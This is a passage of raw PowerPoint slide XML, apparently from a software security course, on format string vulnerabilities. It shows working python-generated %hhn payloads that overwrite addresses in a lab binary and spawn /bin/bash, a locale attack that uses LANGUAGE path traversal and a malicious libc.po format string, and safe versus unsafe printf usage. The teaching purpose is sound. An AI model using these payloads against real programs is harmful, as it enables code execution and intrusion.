                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>hhn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>"'` &gt; test</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>Program received signal SIGSEGV, Segmentation fault.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0xffffba4b in ?? ()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{FCFB7E3C-6220-8942-988C-3F6E25750AD7}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>291</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="102663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 String Exploitation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>At </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0xffffba4b, want </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>0xffffcaf5</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>Need to change output from 0xff to 0xca for next byte</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>Wraparound</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Need to write out 1 + 0xca = 203</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>$ echo `python -c 'print "\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>xdb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>\x97\x04\x08\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>xda</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>\x97\x04\x08\xd9\x97\x04\x08DDDD" + "%239x%2\$hhn%3\$hhn%203x%4\$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>hhn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>"'` &gt; test</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>process 52731 is executing new program: /bin/bash</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>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292</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="54418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 String Exploitation</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latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>$ echo `python -c 'print "\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>xdb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>\x97\x04\x08\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>xda</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>\x97\x04\x08\xd9\x97\x04\x08DDDD" + "%239x%2\$hhn%3\$hhn%203x%4\$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>hhn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>"'` | ./format-simple</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>$ &lt;same as before&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>$ cat test - | ./format-simple </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>whoami</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>adamd</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>id</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>uid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>=500(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>adamd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>gid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>=500(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>adamd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>) groups=500(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>adamd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>),10(wheel) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023</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293</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="40348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450" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>locale</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> attack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1000451" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The localization system contains a database to translate error messages, formats, etc. in a language other than English</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>E.g.: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>/lib/locale/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>it_IT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>/LC_MESSAGES</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>It is possible to specify the language in the language variable (e.g., </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>LANGUAGE=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>it_IT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>When an error is found the language database is searched  for the right message</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>In a vulnerable implementation, it was possible to specify a user-provided language file</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>LANGUAGE=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>it_IT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>/../../../../../../../</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>tmp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Hack"/>
              <a:cs typeface="Hack"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="80184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04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04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04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004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004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498" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>LC_MESSAGE/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>libc.po</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Hack"/>
              <a:cs typeface="Hack"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1002499" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>msgid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> "%s: invalid option -- %c\n"</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>msgstr”%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%63222c%hn%50561c%hn\n"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="1" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="110011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24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4" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Lessons Learned</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1011715" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Whenever an attacker can control the format string of a function such as *</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>() and syslog(), there is the potential for a format string vulnerability</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>fprintf(f</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>buf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>) BAD</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>fprintf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(f, “%s”, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>name_str</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>) GOOD</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>buf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>var_i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>var_j</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>) still BAD</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Format string attacks are made possible by the lack of parameter validation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="41495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17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17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17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117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117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0786" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Where is Overwritten: </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>DATA and BSS Overflows</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="630787" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>#define MAX_STR_LENGTH 16</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFontTx/>
